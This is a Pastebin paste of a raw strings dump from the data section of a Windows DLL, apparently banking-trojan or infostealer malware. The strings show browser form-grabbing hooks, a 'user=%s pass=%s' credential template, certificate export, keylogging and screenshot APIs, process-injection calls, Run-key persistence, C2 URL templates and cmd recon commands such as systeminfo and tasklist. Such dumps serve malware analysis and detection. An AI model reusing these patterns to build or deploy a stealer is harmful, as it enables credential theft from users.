Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- .rdata:10012230 0000000A C PSAPI.DLL
- .rdata:10012240 0000000C C WININET.dll
- .rdata:10012250 0000000C C SHLWAPI.dll
- .rdata:10012260 0000000C C gdiplus.dll
- .rdata:10012270 0000000A C nspr4.dll
- .rdata:10012280 0000000B C WS2_32.dll
- .rdata:10012290 0000000C C CRYPT32.dll
- .rdata:100122A0 0000000B C USER32.dll
- .rdata:100122B0 0000000A C GDI32.dll
- .rdata:100122C0 0000000D C ADVAPI32.dll
- .rdata:100122D0 0000000C C SHELL32.dll
- .rdata:100122E0 0000000A C ole32.dll
- .rdata:100122EC 00000015 C CreateProcessAsUserA
- .rdata:10012304 00000015 C CreateProcessAsUserW
- .rdata:1001231C 0000000D C advapi32.dll
- .rdata:1001232C 0000000F C CreateProcessA
- .rdata:1001233C 0000000F C CreateProcessW
- .rdata:1001234C 0000000D C kernel32.dll
- .rdata:1001235C 00000017 C NtProtectVirtualMemory
- .rdata:10012374 00000017 C LdrGetProcedureAddress
- .rdata:1001238C 0000000B C LdrLoadDll
- .rdata:10012398 0000000A C NTDLL.DLL
- .rdata:100123A4 00000015 C ZwWriteVirtualMemory
- .rdata:100123BC 00000017 C ZwProtectVirtualMemory
- .rdata:100123D4 00000010 C CryptGetUserKey
- .rdata:100123E4 0000000D C ADVAPI32.DLL
- .rdata:100123F4 00000005 C .pfx
- .rdata:1001240C 0000000C C AddressBook
- .rdata:10012418 00000009 C AuthRoot
- .rdata:10012424 00000015 C CertificateAuthority
- .rdata:1001243C 0000000B C Disallowed
- .rdata:10012448 00000005 C Root
- .rdata:10012450 0000000E C TrustedPeople
- .rdata:10012460 00000011 C TrustedPublisher
- .rdata:10012474 0000000B C start rbt\n
- .rdata:10012480 0000000F C adjust succes\n
- .rdata:10012490 0000000D C exit succes\n
- .rdata:100124A0 00000007 C \\\\.\\%s
- .rdata:100124A8 00000008 C %lu.exe
- .rdata:100124B0 0000002E C Software\\Microsoft\\Windows\\CurrentVersion\\Run
- .rdata:100124E4 00000010 C Sart Load DLL\r\n
- .rdata:100124F4 0000001D C Loading DLL: \"%s\" size: %d\r\n
- .rdata:10012514 00000012 C Start Write DLL\r\n
- .rdata:10012528 00000016 C DLL load status: %u\r\n
- .rdata:10012658 0000001C C Started Soccks status {%u\n}
- .rdata:10012674 00000014 C Get info status %u\n
- .rdata:10012688 00000017 C Command received \"%s\"\n
- .rdata:100126A0 0000000C C MakeScreen\n
- .rdata:100126AC 00000008 C FAILED\n
- .rdata:100126B4 0000000D C /t%s.php?%s=
- .rdata:100126C4 00000011 C 0123456789ABCDEF
- .rdata:100126D8 00000010 C 192.168.222.128
- .rdata:100126E8 00000005 C form
- .rdata:100126F0 0000004B C /data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
- .rdata:1001273C 00000007 C Client
- .rdata:10012744 00000005 C Main
- .rdata:1001274C 00000005 C FILE
- .rdata:10012758 0000007B C version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%08X&wake=%u&prjct=%d&arch=%u&inf=0&os=%u.%u.%u&guid=%u.%u.%u!%s!%08X
- .rdata:100127D8 0000000D C /c%s.php?%s=
- .rdata:100127E8 0000000B C CHROME.DLL
- .rdata:100127F4 0000000C C closesocket
- .rdata:10012800 00000008 C WSASend
- .rdata:10012808 00000008 C WSARecv
- .rdata:10012810 0000000B C WS2_32.DLL
- .rdata:1001281C 0000000F C LoadLibraryExW
- .rdata:1001282C 0000000D C KERNEL32.DLL
- .rdata:1001283C 00000007 C .rdata
- .rdata:10012848 00000006 C .text
- .rdata:10012854 00000009 C PR_Close
- .rdata:10012860 00000009 C PR_Write
- .rdata:1001286C 00000008 C PR_Read
- .rdata:10012874 0000000A C NSPR4.DLL
- .rdata:10012880 0000000A C nspr4.dll
- .rdata:1001289C 00000007 C Local\\
- .rdata:100128A4 0000001B C .set DiskDirectory1=\"%s\"\r\n
- .rdata:100128C0 00000019 C .set CabinetName1=\"%s\"\r\n
- .rdata:100128DC 00000007 C \"%s\"\r\n
- .rdata:100128EC 0000001B C .set DestinationDir=\"%S\"\r\n
- .rdata:1001290C 00000007 C \"%S\"\r\n
- .rdata:10012914 00000014 C makecab.exe /F \"%s\"
- .rdata:10012928 0000000B C \\setup.inf
- .rdata:10012934 0000000B C \\setup.rpt
- .rdata:10012940 00000005 C \\*.*
- .rdata:10012948 0000001D C cmd /C \"systeminfo.exe > %s\"
- .rdata:10012968 0000001B C failed start sysinfo - %u\n
- .rdata:10012984 0000001D C cmd /C \"echo -------- >> %s\"
- .rdata:100129A4 00000021 C cmd /C \"tasklist.exe /SVC >> %s\"
- .rdata:100129C8 0000001C C failed start tasklist - %u\n
- .rdata:100129E4 0000001F C cmd /C \"driverquery.exe >> %s\"
- .rdata:10012A04 0000001A C failed start driver - %u\n
- .rdata:10012A20 0000005B C cmd /C \"reg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s >> %s\"
- .rdata:10012A7C 00000015 C failed get reg - %u\n
- .rdata:10012A94 00000006 C Host:
- .rdata:10012A9C 0000000C C User-Agent:
- .rdata:10012AA8 00000010 C Content-Length:
- .rdata:10012AB8 00000013 C Transfer-Encoding:
- .rdata:10012ACC 00000017 C HttpAddRequestHeadersW
- .rdata:10012AE4 00000017 C HttpAddRequestHeadersA
- .rdata:10012AFC 0000000F C HttpQueryInfoW
- .rdata:10012B0C 0000000F C HttpQueryInfoA
- .rdata:10012B1C 00000011 C InternetConnectW
- .rdata:10012B30 00000011 C InternetConnectA
- .rdata:10012B44 0000001B C InternetQueryDataAvailable
- .rdata:10012B60 00000011 C HttpSendRequestW
- .rdata:10012B74 00000011 C HttpSendRequestA
- .rdata:10012B88 00000014 C InternetReadFileExW
- .rdata:10012B9C 00000014 C InternetReadFileExA
- .rdata:10012BB0 00000011 C InternetReadFile
- .rdata:10012BC4 0000000C C WININET.DLL
- .rdata:10012BD0 0000000C C WININET.dll
- .rdata:10012BDC 0000000A C text/html
- .rdata:10012BE8 00000006 C image
- .rdata:10012BF0 0000000A C Referer:
- .rdata:10012BFC 0000001A C URL: %s\r\nuser=%s\r\npass=%s
- .rdata:10012C18 0000000A C identity
- .rdata:10012C24 00000011 C Accept-Encoding:
- .rdata:10012C38 00000005 C \t\r\n
- .rdata:10012C44 0000001F C {%08X-%04X-%04X-%04X-%08X%04X}
- .rdata:10012C64 00000008 C http://
- .rdata:10012C6C 00000009 C https://
- .rdata:10012C90 00000011 C %08x%08x%08x%08x
- .rdata:10012CA4 00000005 C @ID@
- .rdata:10012CB0 00000008 C @GROUP@
- .rdata:10012CB8 00000007 C grabs=
- .rdata:10012CC0 00000008 C NEWGRAB
- .rdata:10012CC8 0000000B C SCREENSHOT
- .rdata:10012CD4 00000008 C PROCESS
- .rdata:10012CDC 00000007 C HIDDEN
- .rdata:10012CE4 00000005 C @%s@
- .rdata:10012CEC 00000005 C http
- .rdata:10012CF4 00000005 C POST
- .rdata:10012CFC 0000000A C URL: %s\r\n
- .rdata:10012D08 0000000C C ExitProcess
- .rdata:10012D14 00000010 C %02u:%02u:%02u
- .rdata:10012D24 00000008 C /fp %lu
- .rdata:10012D2C 00000005 C %x\r\n
- .rdata:10012D34 00000017 C Content-Length: %u\r\n\r\n
- .rdata:10012D4C 00000005 C \r\n\r\n
- .rdata:10012D54 0000000E C Content-Type:
- .rdata:10012D64 00000008 C chunked
- .rdata:10012D6C 00000005 C ocsp
- .rdata:10012D74 00000015 C SOFTWARE\\AppDataLow\\
- .rdata:10012D8C 00000006 C \\Vars
- .rdata:10012D94 0000000A C \\\\.\\pipe\\
- .rdata:10012DA0 0000000C C \\Microsoft\\
- .rdata:10012DAC 00000010 C S:(ML;;NW;;;LW)
- .rdata:10012DC0 00000043 C D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)
- .rdata:10012E10 00000042 C Content-Disposition: form-data; name=\"upload_file\"; filename=\"%s\"
- .rdata:10012E58 00000048 C Content-Disposition: form-data; name=\"upload_file\"; filename=\"%.4u.%lu\"
- .rdata:10012EA0 00000027 C --------------------------%04x%04x%04x
- .rdata:10012EC8 0000002F C Content-Type: multipart/form-data; boundary=%s
- .rdata:10012EF8 0000000B C \r\n--%s--\r\n
- .rdata:10012F04 00000027 C Content-Type: application/octet-stream
- .rdata:10012F2C 00000011 C --%s\r\n%s\r\n%s\r\n\r\n
- .rdata:10012F40 0000000F C IsWow64Process
- .rdata:10012F50 00000009 C kernel32
- .rdata:10012F5C 00000007 C UNKNOW
- .rdata:10012F64 00000021 C ZwWow64QueryInformationProcess64
- .rdata:10012F88 0000000A C ntdll.dll
- .rdata:10012F94 00000005 C .dll
- .rdata:10012F9C 0000000D C LoadLibraryA
- .rdata:10012FAC 0000001B C ZwWow64ReadVirtualMemory64
- .rdata:10012FC8 00000013 C ZwGetContextThread
- .rdata:10012FDC 00000013 C ZwSetContextThread
- .rdata:10012FF0 00000005 C open
- .rdata:10012FF8 0000001D C %08X-%04X-%04X-%04X-%08X%04X
- .rdata:10013018 0000000B C kernelbase
- .rdata:10013024 00000006 C ntdll
- .rdata:1001302C 00000007 C %s=%s&
- .rdata:10013039 00000040 C BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
- .rdata:10013080 00000051 C |$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\\]^_`abcdefghijklmnopq
- .rdata:100130D4 00000012 C SetWindowsHookExW
- .rdata:100130E8 00000012 C SetWindowsHookExA
- .rdata:100130FC 0000000B C user32.dll
- .rdata:1001313C 00000011 C SetThreadDesktop
- .rdata:10013150 00000011 C TranslateMessage
- .rdata:10013164 0000001A C CreateDialogIndirectParam
- .rdata:10013180 00000013 C CreateDialogParamW
- .rdata:10013194 00000013 C CreateDialogParamA
- .rdata:100131A8 00000017 C DialogBoxIndirectParam
- .rdata:100131C0 00000010 C DialogBoxParamW
- .rdata:100131D0 00000010 C DialogBoxParamA
- .rdata:100131E0 00000010 C CreateWindowExW
- .rdata:100131F0 00000010 C CreateWindowExA
- .rdata:10013200 0000000E C CreateWindowW
- .rdata:10013210 0000000E C CreateWindowA
- .rdata:10013616 00000013 C GetMappedFileNameA
- .rdata:1001362C 00000014 C DeleteUrlCacheEntry
- .rdata:10013642 00000018 C FindFirstUrlCacheEntryA
- .rdata:1001365C 00000017 C FindNextUrlCacheEntryA
- .rdata:10013676 00000012 C FindCloseUrlCache
- .rdata:1001368A 0000000F C HttpQueryInfoA
- .rdata:1001369C 00000011 C InternetConnectA
- .rdata:100136B0 0000001B C InternetQueryDataAvailable
- .rdata:100136CE 00000014 C InternetReadFileExA
- .rdata:100136E4 00000011 C InternetReadFile
- .rdata:100136F8 00000011 C InternetConnectW
- .rdata:1001370C 00000011 C HttpSendRequestW
- .rdata:10013720 00000017 C HttpAddRequestHeadersW
- .rdata:1001373A 0000000F C HttpQueryInfoW
- .rdata:1001374C 00000014 C InternetReadFileExW
- .rdata:10013762 00000017 C HttpAddRequestHeadersA
- .rdata:1001377C 0000001A C InternetSetStatusCallback
- .rdata:10013798 00000011 C HttpSendRequestA
- .rdata:100137AC 00000015 C InternetQueryOptionA
- .rdata:100137C4 00000013 C InternetSetOptionA
- .rdata:100137DA 00000011 C HttpOpenRequestA
- .rdata:100137EE 0000000E C InternetOpenA
- .rdata:100137FE 00000014 C InternetCloseHandle
- .rdata:10013814 00000009 C StrRChrA
- .rdata:10013820 00000008 C StrChrW
- .rdata:1001382A 0000000A C StrToIntA
- .rdata:10013836 00000008 C StrChrA
- .rdata:10013840 00000009 C StrTrimA
- .rdata:1001384C 00000009 C StrStrIA
- .rdata:10013858 00000009 C StrRChrW
- .rdata:10013864 00000008 C StrStrA
- .rdata:1001386E 00000009 C StrCmpNA
- .rdata:1001387A 0000000C C StrToIntExA
- .rdata:10013888 00000008 C StrDupA
- .rdata:10013892 00000016 C GdipSaveImageToStream
- .rdata:100138AA 00000019 C GdipGetImageEncodersSize
- .rdata:100138C6 00000011 C GdipDisposeImage
- .rdata:100138DA 0000001C C GdipCreateBitmapFromHBITMAP
- .rdata:100138F8 00000015 C GdipGetImageEncoders
- .rdata:10013910 0000000F C GdiplusStartup
- .rdata:10013922 00000008 C PR_Poll
- .rdata:1001392C 0000000C C PR_GetError
- .rdata:1001393A 00000008 C PR_Read
- .rdata:10013944 00000009 C PR_Write
- .rdata:10013950 0000000C C PR_SetError
- .rdata:1001395E 00000009 C PR_Close
- .rdata:1001396A 0000000F C WSACreateEvent
- .rdata:1001397C 0000000F C WSAEventSelect
- .rdata:1001398E 00000015 C WSAEnumNetworkEvents
- .rdata:100139A6 00000008 C WSASend
- .rdata:100139B0 00000008 C WSARecv
- .rdata:100139BA 0000000C C WSASetEvent
- .rdata:100139C8 0000000E C WSACloseEvent
- .rdata:100139D8 00000015 C CertOpenSystemStoreW
- .rdata:100139F0 0000000F C CertCloseStore
- .rdata:10013A02 0000001C C CertEnumCertificatesInStore
- .rdata:10013A20 00000015 C PFXExportCertStoreEx
- .rdata:10013A38 0000000E C ExitWindowsEx
- .rdata:10013A48 0000000A C wsprintfA
- .rdata:10013A54 00000011 C GetDesktopWindow
- .rdata:10013A68 00000014 C GetForegroundWindow
- .rdata:10013A7E 0000000C C GetWindowDC
- .rdata:10013A8C 0000000E C GetWindowRect
- .rdata:10013A9C 0000000F C GetShellWindow
- .rdata:10013AAE 00000019 C GetWindowThreadProcessId
- .rdata:10013ACA 00000017 C CreateCompatibleBitmap
- .rdata:10013AE4 00000013 C CreateCompatibleDC
- .rdata:10013AFA 0000000D C SelectObject
- .rdata:10013B0A 0000000D C DeleteObject
- .rdata:10013B1A 00000009 C DeleteDC
- .rdata:10013B26 00000007 C BitBlt
- .rdata:10013B30 00000010 C CryptGetUserKey
- .rdata:10013B42 0000000F C RegSetValueExA
- .rdata:10013B54 0000000E C RegCreateKeyA
- .rdata:10013B64 0000000C C RegCloseKey
- .rdata:10013B72 00000011 C RegQueryValueExA
- .rdata:10013B86 00000018 C RegNotifyChangeKeyValue
- .rdata:10013BA0 0000000C C RegOpenKeyA
- .rdata:10013BAE 0000000E C RegEnumValueA
- .rdata:10013BBE 00000011 C SHGetFolderPathW
- .rdata:10013BD2 00000011 C SHGetFolderPathA
- .rdata:10013BE6 0000000D C CoCreateGuid
- .rdata:10013BF6 00000016 C CreateStreamOnHGlobal
- .rdata:10013C0E 00000015 C GetHGlobalFromStream
- .rdata:10013C26 00000013 C EnumProcessModules
- .rdata:10013C3C 00000015 C GetModuleFileNameExW
- .rdata:10013C54 0000000C C ToUnicodeEx
- .rdata:10013C62 00000014 C UnhookWindowsHookEx
- .rdata:10013C78 00000012 C SetWindowsHookExA
- .rdata:10013C8C 0000000C C GetAncestor
- .rdata:10013C9A 00000012 C GetKeyboardLayout
- .rdata:10013CAE 00000011 C GetKeyboardState
- .rdata:10013CC2 0000000F C CallNextHookEx
- .rdata:10013CD4 0000000F C GetWindowTextW
- .rdata:10013CE6 0000000A C wsprintfW
- .rdata:10013CF2 00000015 C CreateProcessAsUserA
- .rdata:10013D0A 00000015 C CreateProcessAsUserW
- .rdata:10013D22 00000035 C ConvertStringSecurityDescriptorToSecurityDescriptorA
- .rdata:10013D5A 0000000E C ShellExecuteA
- .rdata:100141DE 00000007 C memset
- .rdata:100141E8 00000013 C RtlAdjustPrivilege
- .rdata:100141FE 00000007 C memcpy
- .rdata:10014208 00000007 C wcscpy
- .rdata:10014212 00000009 C mbstowcs
- .rdata:1001421E 00000009 C wcstombs
- .rdata:1001422A 00000007 C strcpy
- .rdata:10014234 00000008 C _strupr
- .rdata:1001423E 00000007 C strstr
- .rdata:10014246 0000000A C ntdll.dll
- .rdata:10014252 0000000C C CreateFileA
- .rdata:10014260 00000009 C lstrlenA
- .rdata:1001426C 0000000A C HeapAlloc
- .rdata:10014278 00000009 C HeapFree
- .rdata:10014284 0000000A C WriteFile
- .rdata:10014290 00000009 C lstrcatA
- .rdata:1001429C 00000011 C CreateDirectoryA
- .rdata:100142B0 0000000D C GetLastError
- .rdata:100142C0 00000011 C RemoveDirectoryA
- .rdata:100142D4 0000000D C LoadLibraryA
- .rdata:100142E4 0000000C C CloseHandle
- .rdata:100142F2 0000000C C DeleteFileA
- .rdata:10014300 00000009 C lstrcpyA
- .rdata:1001430C 0000000C C HeapReAlloc
- .rdata:1001431A 00000015 C InterlockedIncrement
- .rdata:10014332 00000015 C InterlockedDecrement
- .rdata:1001434A 00000009 C SetEvent
- .rdata:10014356 0000000D C GetTickCount
- .rdata:10014366 0000000C C HeapDestroy
- .rdata:10014374 0000000B C HeapCreate
- .rdata:10014382 00000013 C GetCurrentThreadId
- .rdata:10014398 00000011 C CreateDirectoryW
- .rdata:100143AC 00000015 C GetWindowsDirectoryA
- .rdata:100143C4 00000006 C Sleep
- .rdata:100143CC 0000000A C CopyFileW
- .rdata:100143D8 00000009 C lstrlenW
- .rdata:100143E4 00000011 C GetModuleHandleA
- .rdata:100143F8 00000009 C lstrcatW
- .rdata:10014404 0000000C C DeleteFileW
- .rdata:10014412 0000000D C GetTempPathA
- .rdata:10014422 0000000E C MapViewOfFile
- .rdata:10014432 00000010 C UnmapViewOfFile
- .rdata:10014444 00000011 C SetWaitableTimer
- .rdata:10014458 00000012 C GetCurrentProcess
- .rdata:1001446C 0000000D C CreateEventA
- .rdata:1001447C 00000015 C LeaveCriticalSection
- .rdata:10014494 0000000A C lstrcmpiA
- .rdata:100144A0 00000015 C EnterCriticalSection
- .rdata:100144B8 00000017 C WaitForMultipleObjects
- .rdata:100144D2 0000000D C CreateMutexA
- .rdata:100144E2 0000000D C ReleaseMutex
- .rdata:100144F2 00000015 C CreateWaitableTimerA
- .rdata:1001450A 0000000F C UnregisterWait
- .rdata:1001451C 0000000F C LoadLibraryExW
- .rdata:1001452E 00000014 C WaitForSingleObject
- .rdata:10014544 0000000D C SetLastError
- .rdata:10014554 0000001C C RegisterWaitForSingleObject
- .rdata:10014572 0000000C C GetFileSize
- .rdata:10014580 0000000F C FindFirstFileW
- .rdata:10014592 0000000E C GetDriveTypeW
- .rdata:100145A2 00000018 C GetLogicalDriveStringsW
- .rdata:100145BC 0000001A C InitializeCriticalSection
- .rdata:100145D8 00000013 C GetFileAttributesA
- .rdata:100145EE 00000013 C GetFileAttributesW
- .rdata:10014604 0000000F C CreateProcessA
- .rdata:10014616 0000000C C CreateFileW
- .rdata:10014624 0000000F C FindFirstFileA
- .rdata:10014636 00000011 C GetTempFileNameA
- .rdata:1001464A 0000000A C FindClose
- .rdata:10014656 00000013 C CreateFileMappingA
- .rdata:1001466C 0000000E C FindNextFileA
- .rdata:1001467C 0000000E C FindNextFileW
- .rdata:1001468C 00000016 C DeleteCriticalSection
- .rdata:100146A4 00000011 C OpenFileMappingA
- .rdata:100146B8 0000000D C CreateThread
- .rdata:100146C8 0000000A C lstrcpynA
- .rdata:100146D4 00000009 C lstrcmpA
- .rdata:100146E0 0000000B C GlobalLock
- .rdata:100146EE 0000000D C GlobalUnlock
- .rdata:100146FE 0000000E C Thread32First
- .rdata:1001470E 0000000D C Thread32Next
- .rdata:1001471E 0000000F C GetProcAddress
- .rdata:10014730 0000000D C QueueUserAPC
- .rdata:10014740 0000000B C OpenThread
- .rdata:1001474E 00000019 C CreateToolhelp32Snapshot
- .rdata:1001476A 0000000F C CallNamedPipeA
- .rdata:1001477C 0000000F C WaitNamedPipeA
- .rdata:1001478E 00000011 C ConnectNamedPipe
- .rdata:100147A2 00000009 C ReadFile
- .rdata:100147AE 00000014 C GetOverlappedResult
- .rdata:100147C4 00000014 C DisconnectNamedPipe
- .rdata:100147DA 00000011 C FlushFileBuffers
- .rdata:100147EE 00000011 C CreateNamedPipeA
- .rdata:10014802 00000009 C CancelIo
- .rdata:1001480E 00000014 C GetCurrentProcessId
- .rdata:10014824 0000000E C GetSystemTime
- .rdata:10014834 00000009 C lstrcmpW
- .rdata:10014840 00000008 C SleepEx
- .rdata:1001484A 0000000B C ResetEvent
- .rdata:10014858 0000000B C LocalAlloc
- .rdata:10014866 0000000A C LocalFree
- .rdata:10014872 0000000C C FreeLibrary
- .rdata:10014880 00000014 C InterlockedExchange
- .rdata:10014896 0000000F C RaiseException
- .rdata:100148A6 0000000D C KERNEL32.dll
- .rdata:100148B6 00000016 C RtlNtStatusToDosError
- .rdata:100148CE 00000013 C NtMapViewOfSection
- .rdata:100148E4 00000015 C NtUnmapViewOfSection
- .rdata:100148FC 00000008 C ZwClose
- .rdata:10014906 00000010 C NtCreateSection
- .rdata:10014918 00000013 C NtSetContextThread
- .rdata:1001492E 0000001A C ZwQueryInformationProcess
- .rdata:1001494A 00000013 C NtGetContextThread
- .rdata:10014960 00000013 C ZwOpenProcessToken
- .rdata:10014976 0000000E C ZwOpenProcess
- .rdata:10014986 00000018 C ZwQueryInformationToken
- .rdata:100149A0 00000008 C sprintf
- .rdata:100149AA 00000013 C WriteProcessMemory
- .rdata:100149C0 00000011 C VirtualProtectEx
- .rdata:100149D4 00000012 C ReadProcessMemory
- .rdata:100149E8 0000000E C SuspendThread
- .rdata:100149F8 0000000D C ResumeThread
- .rdata:10014A08 0000000F C SwitchToThread
- .rdata:10014A1A 00000011 C GetThreadContext
- .rdata:10014A2E 0000000F C CreateProcessW
- .rdata:10014A40 00000011 C GetComputerNameA
- .rdata:10014A54 0000000B C GetVersion
- .rdata:10014A62 0000000F C SetFilePointer
- .rdata:10014A74 0000000C C VirtualFree
- .rdata:10014A82 00000013 C CreateRemoteThread
- .rdata:10014A98 0000000C C OpenProcess
- .rdata:10014AA6 0000000D C VirtualAlloc
- .rdata:10014AB6 0000000F C VirtualAllocEx
- .rdata:10014AC8 00000013 C GetModuleFileNameA
- .rdata:10014ADE 0000000F C VirtualProtect
- .rdata:10014AF0 00000012 C QueueUserWorkItem
- .rdata:10014B04 00000009 C _aulldiv
- .rdata:10014B10 00000008 C _allmul
- .rdata:10014B1A 0000000A C RtlUnwind
- .rdata:10014B26 00000015 C NtQueryVirtualMemory
- .rdata:10014B72 0000000B C client.dll
- .rdata:10014B7D 00000014 C CreateProcessNotify
- .data:1001518B 0000000D C SUVWATAUAVAWH
- .data:100151AF 00000005 C Hcz<H
- .data:1001545E 0000000D C HA_A^A]A\\_^][
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement